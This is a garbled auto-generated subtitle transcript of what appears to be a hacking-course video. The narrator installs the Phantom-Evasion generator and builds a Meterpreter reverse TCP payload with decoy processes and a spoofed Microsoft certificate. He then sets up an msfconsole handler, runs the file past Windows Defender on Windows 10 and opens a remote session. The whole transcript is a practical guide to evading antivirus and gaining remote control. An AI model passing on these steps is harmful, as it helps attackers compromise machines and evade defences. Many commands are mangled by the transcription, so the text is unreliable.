1
00:00:00,330 --> 00:00:06,040
MSM venom is a really good tool when you're trying to generate payloads.

2
00:00:06,630 --> 00:00:11,920
It has a whole lot of features that allow you to play with many things in payloads.

3
00:00:12,540 --> 00:00:19,170
However, antivirus software companies constantly update their databases and detection mechanisms.

4
00:00:19,630 --> 00:00:25,560
As I said before, they can use artificial intelligence and machine learning, cloud computing and many

5
00:00:25,560 --> 00:00:30,660
other technologies to improve their products because they're trying to sell them and make a profit.

6
00:00:31,110 --> 00:00:36,140
So that means M7 and payloads are pretty much always detected.

7
00:00:36,150 --> 00:00:43,020
I'd say, you know, 85 percent of the time mostly will say they're detected by these improved technologies.

8
00:00:43,920 --> 00:00:45,390
But I want to show you something.

9
00:00:46,510 --> 00:00:47,980
So open Windows 10.

10
00:00:48,960 --> 00:00:56,310
And go to HTP tend tend to dot one one 8000.

11
00:00:57,280 --> 00:01:04,300
To view our malware folder from a browser now the three files that we created in the previous videos

12
00:01:04,300 --> 00:01:12,430
are here, so let's download them in order to click on normal that you sexy and say, well, Windows

13
00:01:12,430 --> 00:01:15,490
defender to Texas as a virus.

14
00:01:16,540 --> 00:01:20,600
It detects it even when I downloaded, but not when I launch.

15
00:01:21,130 --> 00:01:22,610
See, that's a big improvement.

16
00:01:23,920 --> 00:01:29,770
So the next file download encoded Donnie XY and say so.

17
00:01:29,950 --> 00:01:36,640
As you can see, while downloading Defendor scans a file case that's detected as well as have a look

18
00:01:36,640 --> 00:01:41,440
at the third file, click it to download and say that defenders also scanning the file.

19
00:01:42,120 --> 00:01:45,880
OK, unfortunately it's also detected as a virus.

20
00:01:47,040 --> 00:01:48,630
So then let's go back to Colin.

21
00:01:50,220 --> 00:01:51,800
What do you think we should do at the moment?

22
00:01:52,620 --> 00:01:59,360
So the point I'm trying to make here is that antivirus software and payload generators are in competition.

23
00:02:00,000 --> 00:02:06,810
So today your payload can successfully execute on your targets and you can evade the antivirus software.

24
00:02:07,080 --> 00:02:14,750
But a few days go by and the same payload may be prevented to be executed and detected as malware.

25
00:02:15,300 --> 00:02:18,660
So then you need to find a new custom payload generator.

26
00:02:19,720 --> 00:02:28,480
So at the time I record this cause I'm looking for a custom payload generator and I found one on GitHub

27
00:02:29,200 --> 00:02:31,960
and you can use this one or find another one for yourself.

28
00:02:32,710 --> 00:02:33,300
All righty, then.

29
00:02:33,790 --> 00:02:38,230
Let me show you first how to install this custom generator.

30
00:02:38,980 --> 00:02:42,730
So I'm going to use another COLLY instance for a fresh install.

31
00:02:43,540 --> 00:02:47,440
So open up your browser and go to this GitHub address.

32
00:02:48,160 --> 00:02:51,760
Fantham Evasion is the name of this PAVOL Generator.

33
00:02:53,140 --> 00:02:55,240
So I'll download it as a zip file.

34
00:02:58,620 --> 00:03:00,510
Then open file explorer and.

35
00:03:01,520 --> 00:03:02,990
Go to the download directory.

36
00:03:04,290 --> 00:03:05,040
And it.

37
00:03:07,420 --> 00:03:13,730
And you can cut her copy the extracted folder to the Iranian folder on the desktop.

38
00:03:14,410 --> 00:03:17,740
So here are the files in the phantom folder.

39
00:03:18,310 --> 00:03:20,230
Close it up and open your terminal.

40
00:03:21,550 --> 00:03:25,510
So change the directory to fantham folder like this.

41
00:03:26,770 --> 00:03:38,350
Then type S.H. Mod plus X Phantom evasion that he wanted to make the file run by the current user and

42
00:03:38,350 --> 00:03:45,030
then type Python Phantom Evasion Dot PWI to start the installation.

43
00:03:46,110 --> 00:03:53,130
So the insulation will take a really long time, but be patient and as always, I'm not going to record

44
00:03:53,130 --> 00:03:54,060
the whole insulation.

45
00:03:54,070 --> 00:03:54,920
You just wait for it.

46
00:03:56,030 --> 00:04:02,390
And we're back after the insulation, you will have this green, which means you installed it perfectly.

47
00:04:02,820 --> 00:04:04,130
Now I'm going to go back to my colleague.

48
00:04:05,270 --> 00:04:07,910
And go to Fantham folder.

49
00:04:08,860 --> 00:04:10,120
Then run.

50
00:04:11,250 --> 00:04:15,570
Python, fantham, evasion, dopy, why?

51
00:04:19,240 --> 00:04:26,050
Now you can explore all the modules, there are many, many very useful, but what I'm looking for is

52
00:04:26,080 --> 00:04:32,350
a stealthy Windows payload, so type one and it will be stagers.

53
00:04:32,350 --> 00:04:33,400
So type to.

54
00:04:34,290 --> 00:04:39,450
Windows 10 boxes, 64 bit, so type to.

55
00:04:41,770 --> 00:04:48,100
And then these are the payloads that phantom evasion provides for it, so I'm going to choose the fourth

56
00:04:48,100 --> 00:04:48,400
one.

57
00:04:49,700 --> 00:04:52,760
It's 64 interpretor reverse TCP.

58
00:04:54,080 --> 00:04:57,350
So this has a short but informative warning.

59
00:04:58,220 --> 00:05:03,740
And it also shows the required payload for the handler, so I'll press enter to continue.

60
00:05:04,730 --> 00:05:08,900
Provide host, which is then 10 to 11.

61
00:05:09,760 --> 00:05:11,650
Allport is four for three.

62
00:05:12,820 --> 00:05:17,070
Then file name Fantham, I think is a good name.

63
00:05:18,390 --> 00:05:23,230
Now it's good to add multiple processes, behaviors, so type Y.

64
00:05:24,220 --> 00:05:27,640
Insert two decoy processes.

65
00:05:28,740 --> 00:05:32,580
And striping the executable will also help, so type why?

66
00:05:34,540 --> 00:05:37,360
It will sign the executable if you want.

67
00:05:37,390 --> 00:05:38,260
So, yeah, I do.

68
00:05:38,620 --> 00:05:39,460
So type Y.

69
00:05:41,140 --> 00:05:47,020
So it'll spoof Microsoft CERT and fill with no pat information.

70
00:05:48,920 --> 00:05:52,040
And then finally, the payload is generated, so.

71
00:05:53,060 --> 00:05:58,850
The file is in the phantom invasion directory and open up a new tab at least.

72
00:06:00,150 --> 00:06:05,430
And as you're looking at what I'm looking at, you will see the phantom that actually is right here.

73
00:06:06,340 --> 00:06:12,490
All right, move Phantom Daddy exi to route desktop malware.

74
00:06:13,970 --> 00:06:21,020
So I moved here because I already have run the Python server from this folder, so now I'll go to the

75
00:06:21,020 --> 00:06:28,480
MSF council, said payload to Windows XP 64 interpretor reverse TCP.

76
00:06:30,780 --> 00:06:34,710
Said host to ten point ten to one one.

77
00:06:35,760 --> 00:06:38,760
And said airport to 443.

78
00:06:40,350 --> 00:06:44,090
So options to check, make sure everything's OK.

79
00:06:45,220 --> 00:06:47,800
And if there's no problem, then exploit Jay.

80
00:06:49,950 --> 00:06:57,720
OK, so now open Windows 10 and open the download page for our executables, refresh the page.

81
00:06:58,660 --> 00:07:02,470
Now download The Phantom that sexy and save it.

82
00:07:04,430 --> 00:07:07,310
Windows Defender is scanning the file.

83
00:07:08,310 --> 00:07:12,600
And just like that, it does not detect anything.

84
00:07:13,590 --> 00:07:15,210
So now open the download folder.

85
00:07:16,400 --> 00:07:19,130
And double click the final to launch it.

86
00:07:21,380 --> 00:07:24,950
Now, you might think you are detected, but no.

87
00:07:26,160 --> 00:07:32,250
Click more info and you'll see why, because Microsoft doesn't know the publisher of this executable.

88
00:07:33,140 --> 00:07:39,650
So it just warns us, which nobody really cares about, that, you know, it warns even for very well

89
00:07:39,650 --> 00:07:42,530
known applications, so you can run it anyway.

90
00:07:42,590 --> 00:07:43,340
Most people do.

91
00:07:44,360 --> 00:07:48,230
Then go to Cali and open MSF console tab.

92
00:07:49,690 --> 00:07:56,410
So here's a tip, because you use the decoy processes and some other techniques apply to the payload

93
00:07:56,410 --> 00:08:01,990
as well, it's going to connect back, but it's going to take a bit to just wait for it.

94
00:08:02,740 --> 00:08:04,480
Believe me, the session will open.

95
00:08:06,440 --> 00:08:08,010
OK, it didn't prove me wrong.

96
00:08:08,150 --> 00:08:10,070
There it is, the session has opened.

97
00:08:11,400 --> 00:08:13,410
Hit enter and type section.

98
00:08:14,720 --> 00:08:16,790
So now you can interact with Section eight.

99
00:08:18,940 --> 00:08:20,680
Type get Eweida.

100
00:08:21,900 --> 00:08:22,890
Cesan fo.

101
00:08:23,840 --> 00:08:30,980
And congratulations, you have now evaded the Windows defender on Windows 10 and got an interpreter

102
00:08:30,980 --> 00:08:31,460
session.

103
00:08:32,560 --> 00:08:33,250
Well done.